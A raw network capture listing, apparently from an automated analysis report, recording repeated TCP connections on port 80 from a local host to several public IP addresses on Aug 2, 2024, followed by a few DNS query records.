            Aug 2, 2024 13:52:19.549926043 CEST804975015.197.172.60192.168.2.6
            Aug 2, 2024 13:52:19.553154945 CEST4975080192.168.2.615.197.172.60
            Aug 2, 2024 13:52:20.509658098 CEST4975080192.168.2.615.197.172.60
            Aug 2, 2024 13:52:20.514703035 CEST804975015.197.172.60192.168.2.6
            Aug 2, 2024 13:52:21.528521061 CEST4975180192.168.2.615.197.172.60
            Aug 2, 2024 13:52:22.078825951 CEST804975115.197.172.60192.168.2.6
            Aug 2, 2024 13:52:22.078939915 CEST4975180192.168.2.615.197.172.60
            Aug 2, 2024 13:52:22.081341982 CEST4975180192.168.2.615.197.172.60
            Aug 2, 2024 13:52:22.086342096 CEST804975115.197.172.60192.168.2.6
            Aug 2, 2024 13:52:22.086354971 CEST804975115.197.172.60192.168.2.6
            Aug 2, 2024 13:52:22.612723112 CEST804975115.197.172.60192.168.2.6
            Aug 2, 2024 13:52:22.612792969 CEST4975180192.168.2.615.197.172.60
            Aug 2, 2024 13:52:23.588037014 CEST4975180192.168.2.615.197.172.60
            Aug 2, 2024 13:52:23.592932940 CEST804975115.197.172.60192.168.2.6
            Aug 2, 2024 13:52:24.608506918 CEST4975280192.168.2.615.197.172.60
            Aug 2, 2024 13:52:24.613481045 CEST804975215.197.172.60192.168.2.6
            Aug 2, 2024 13:52:24.614785910 CEST4975280192.168.2.615.197.172.60
            Aug 2, 2024 13:52:24.615874052 CEST4975280192.168.2.615.197.172.60
            Aug 2, 2024 13:52:24.620668888 CEST804975215.197.172.60192.168.2.6
            Aug 2, 2024 13:52:25.093091965 CEST804975215.197.172.60192.168.2.6
            Aug 2, 2024 13:52:25.093285084 CEST804975215.197.172.60192.168.2.6
            Aug 2, 2024 13:52:25.093527079 CEST4975280192.168.2.615.197.172.60
            Aug 2, 2024 13:52:25.097081900 CEST4975280192.168.2.615.197.172.60
            Aug 2, 2024 13:52:25.101860046 CEST804975215.197.172.60192.168.2.6
            Aug 2, 2024 13:52:30.144768000 CEST4975380192.168.2.666.29.149.46
            Aug 2, 2024 13:52:30.149847031 CEST804975366.29.149.46192.168.2.6
            Aug 2, 2024 13:52:30.149925947 CEST4975380192.168.2.666.29.149.46
            Aug 2, 2024 13:52:30.152224064 CEST4975380192.168.2.666.29.149.46
            Aug 2, 2024 13:52:30.157674074 CEST804975366.29.149.46192.168.2.6
            Aug 2, 2024 13:52:30.815274000 CEST804975366.29.149.46192.168.2.6
            Aug 2, 2024 13:52:30.815391064 CEST804975366.29.149.46192.168.2.6
            Aug 2, 2024 13:52:30.821188927 CEST4975380192.168.2.666.29.149.46
            Aug 2, 2024 13:52:31.665966034 CEST4975380192.168.2.666.29.149.46
            Aug 2, 2024 13:52:32.689099073 CEST4975680192.168.2.666.29.149.46
            Aug 2, 2024 13:52:32.694000006 CEST804975666.29.149.46192.168.2.6
            Aug 2, 2024 13:52:32.694256067 CEST4975680192.168.2.666.29.149.46
            Aug 2, 2024 13:52:32.696614981 CEST4975680192.168.2.666.29.149.46
            Aug 2, 2024 13:52:32.701395035 CEST804975666.29.149.46192.168.2.6
            Aug 2, 2024 13:52:33.360078096 CEST804975666.29.149.46192.168.2.6
            Aug 2, 2024 13:52:33.360382080 CEST804975666.29.149.46192.168.2.6
            Aug 2, 2024 13:52:33.362118006 CEST4975680192.168.2.666.29.149.46
            Aug 2, 2024 13:52:34.212807894 CEST4975680192.168.2.666.29.149.46
            Aug 2, 2024 13:52:35.232666969 CEST4975780192.168.2.666.29.149.46
            Aug 2, 2024 13:52:35.239523888 CEST804975766.29.149.46192.168.2.6
            Aug 2, 2024 13:52:35.241241932 CEST4975780192.168.2.666.29.149.46
            Aug 2, 2024 13:52:35.245125055 CEST4975780192.168.2.666.29.149.46
            Aug 2, 2024 13:52:35.250716925 CEST804975766.29.149.46192.168.2.6
            Aug 2, 2024 13:52:35.250750065 CEST804975766.29.149.46192.168.2.6
            Aug 2, 2024 13:52:35.869472980 CEST804975766.29.149.46192.168.2.6
            Aug 2, 2024 13:52:35.870050907 CEST804975766.29.149.46192.168.2.6
            Aug 2, 2024 13:52:35.870098114 CEST4975780192.168.2.666.29.149.46
            Aug 2, 2024 13:52:36.759891033 CEST4975780192.168.2.666.29.149.46
            Aug 2, 2024 13:52:37.779133081 CEST4975880192.168.2.666.29.149.46
            Aug 2, 2024 13:52:37.784277916 CEST804975866.29.149.46192.168.2.6
            Aug 2, 2024 13:52:37.784359932 CEST4975880192.168.2.666.29.149.46
            Aug 2, 2024 13:52:37.786711931 CEST4975880192.168.2.666.29.149.46
            Aug 2, 2024 13:52:37.791681051 CEST804975866.29.149.46192.168.2.6
            Aug 2, 2024 13:52:38.430005074 CEST804975866.29.149.46192.168.2.6
            Aug 2, 2024 13:52:38.434871912 CEST804975866.29.149.46192.168.2.6
            Aug 2, 2024 13:52:38.434978962 CEST4975880192.168.2.666.29.149.46
            Aug 2, 2024 13:52:38.435976028 CEST4975880192.168.2.666.29.149.46
            Aug 2, 2024 13:52:38.440824032 CEST804975866.29.149.46192.168.2.6
            Aug 2, 2024 13:52:43.537992001 CEST4975980192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:43.542994976 CEST8049759195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:43.543093920 CEST4975980192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:43.545048952 CEST4975980192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:43.553185940 CEST8049759195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:44.273008108 CEST8049759195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:44.273590088 CEST8049759195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:44.273699999 CEST4975980192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:45.057173014 CEST4975980192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:46.082648993 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:46.087651014 CEST8049760195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:46.087764978 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:46.090212107 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:46.095108032 CEST8049760195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:46.775857925 CEST8049760195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:46.775986910 CEST8049760195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:46.779866934 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:47.603493929 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.622704029 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.627770901 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:48.627880096 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.630045891 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.634917974 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:48.635745049 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:49.336429119 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:49.336441994 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:49.336574078 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:50.140805960 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.155159950 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.162760973 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.163003922 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.165463924 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.170613050 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.871396065 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.871475935 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.871609926 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.874687910 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.881196976 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:57.398654938 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:57.405225039 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:57.408318996 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:57.411190987 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:57.416490078 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:57.913906097 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:57.913959980 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:58.915971994 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:58.929197073 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:59.936043024 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:52:59.941262960 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:52:59.941328049 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:52:59.943882942 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:52:59.948771954 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:53:00.436338902 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:53:00.436422110 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:53:01.451515913 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:53:01.456526995 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.466795921 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:02.471798897 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.471878052 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:02.474021912 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:02.479047060 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.479120016 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.971468925 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.971611977 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:03.978542089 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:03.983798027 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:04.997124910 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.002213001 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.002340078 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.004097939 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.009133101 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.501517057 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.502782106 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.503000021 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.505700111 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.510812998 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:19.015218973 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:19.020235062 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.020603895 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:19.022710085 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:19.027859926 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.593957901 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.594089985 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.594165087 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:20.525558949 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.545015097 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.555551052 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:21.556163073 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.558305979 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.563421011 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:22.142978907 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:22.143121004 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:22.143193007 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:23.072304010 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.091871977 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.096899033 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.096971989 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.099364042 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.104518890 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.104532957 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.672560930 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.672996998 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.673150063 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:25.605238914 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.623091936 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.628134966 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:26.628245115 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.630445004 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.635461092 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:27.259416103 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:27.259557009 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:27.259778023 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:27.265239954 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:27.271522045 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:35.331267118 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.336103916 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.336239100 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.339806080 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.345046997 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868133068 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868191957 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868242025 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868252039 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868283987 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.868283987 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:36.855360031 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.873577118 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.878840923 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:37.878920078 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.881253004 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.886255026 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363174915 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363200903 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363262892 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:38.363351107 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363387108 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:39.384840012 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.419657946 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.424968004 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.425045967 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.427459955 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.432626963 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.432651997 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922607899 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922648907 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922734022 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922902107 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:41.931791067 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.950613022 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.955746889 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:42.956491947 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.959279060 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.964572906 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440464973 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440551996 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440783024 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440829039 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:43.440975904 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:43.443440914 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:43.448282003 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:56.764864922 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:56.769834995 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:56.769906998 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:56.772433043 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:56.777345896 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:57.323911905 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:57.324048042 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:58.276041985 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:58.281553030 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.295722961 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:53:59.300992012 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.303679943 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:53:59.307461977 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:53:59.315119982 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.843750000 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.845412970 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:54:00.807029009 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:54:00.998713970 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:54:01.825542927 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:01.833333969 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:01.835647106 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:01.841324091 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:01.847141027 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:01.847460985 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:02.364799023 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:02.364864111 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:03.353626966 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:03.358673096 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.372670889 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.378901958 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.379035950 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.381237030 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.387762070 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.921484947 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.925630093 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.929413080 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.934380054 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:10.104614019 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.109591961 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.109734058 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.112143040 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.117243052 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844825983 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844846964 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844861031 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844875097 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844901085 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.844943047 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:11.619519949 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.638818979 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.643665075 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:12.643731117 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.646102905 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.650914907 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348253965 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348283052 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348309040 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348334074 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348335028 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:13.348428965 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:14.150568008 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.169437885 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.177263021 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.177512884 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.179466009 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.184546947 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.184575081 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888492107 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888547897 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888554096 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888559103 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888614893 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:16.681778908 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.700731993 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.706990957 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:17.708058119 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.711461067 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.719777107 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417612076 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417706013 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417717934 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417776108 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417787075 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417799950 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417841911 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.417864084 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417879105 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417890072 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.417891979 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417902946 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417921066 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.417942047 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.423356056 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.428190947 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:26.490597010 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:26.495645046 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:26.495708942 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:26.497638941 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:26.502443075 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:27.402843952 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:27.402904987 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:27.403002977 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:27.405644894 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:27.410511971 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:34.200560093 CEST6452480192.168.2.652.25.92.0
            Aug 2, 2024 13:54:34.207166910 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.207285881 CEST6452480192.168.2.652.25.92.0
            Aug 2, 2024 13:54:34.209228039 CEST6452480192.168.2.652.25.92.0
            Aug 2, 2024 13:54:34.214245081 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837361097 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837378025 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837398052 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837697029 CEST6452480192.168.2.652.25.92.0

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 2, 2024 13:50:51.228025913 CEST5376853192.168.2.61.1.1.1
            Aug 2, 2024 13:50:52.212675095 CEST5376853192.168.2.61.1.1.1
            Aug 2, 2024 13:50:52.785023928 CEST53537681.1.1.1192.168.2.6
            Aug 2, 2024 13:50:52.785034895 CEST53537681.1.1.1192.168.2.6
            Aug 2, 2024 13:51:07.858867884 CEST5138653192.168.2.61.1.1.1
            Aug 2, 2024 13:51:08.196863890 CEST53513861.1.1.1192.168.2.6
            Aug 2, 2024 13:51:21.685153008 CEST5901753192.168.2.61.1.1.1
            Aug 2, 2024 13:51:22.053474903 CEST53590171.1.1.1192.168.2.6
            Aug 2, 2024 13:51:35.614331961 CEST5167053192.168.2.61.1.1.1
            Aug 2, 2024 13:51:35.631979942 CEST53516701.1.1.1192.168.2.6
            Aug 2, 2024 13:51:48.920150042 CEST5607153192.168.2.61.1.1.1
            Aug 2, 2024 13:51:49.045622110 CEST53560711.1.1.1192.168.2.6
            Aug 2, 2024 13:52:02.436141968 CEST5560653192.168.2.61.1.1.1
            Aug 2, 2024 13:52:02.454740047 CEST53556061.1.1.1192.168.2.6
            Aug 2, 2024 13:52:16.201751947 CEST5087653192.168.2.61.1.1.1
            Aug 2, 2024 13:52:16.450155020 CEST53508761.1.1.1192.168.2.6
            Aug 2, 2024 13:52:30.108503103 CEST5188553192.168.2.61.1.1.1
            Aug 2, 2024 13:52:30.141890049 CEST53518851.1.1.1192.168.2.6
            Aug 2, 2024 13:52:43.451426983 CEST6027753192.168.2.61.1.1.1
            Aug 2, 2024 13:52:43.534775972 CEST53602771.1.1.1192.168.2.6
            Aug 2, 2024 13:52:56.889158010 CEST4997653192.168.2.61.1.1.1
            Aug 2, 2024 13:52:57.395076036 CEST53499761.1.1.1192.168.2.6
            Aug 2, 2024 13:53:10.514247894 CEST6368053192.168.2.61.1.1.1
            Aug 2, 2024 13:53:10.867156982 CEST53636801.1.1.1192.168.2.6
            Aug 2, 2024 13:53:18.937091112 CEST5215853192.168.2.61.1.1.1
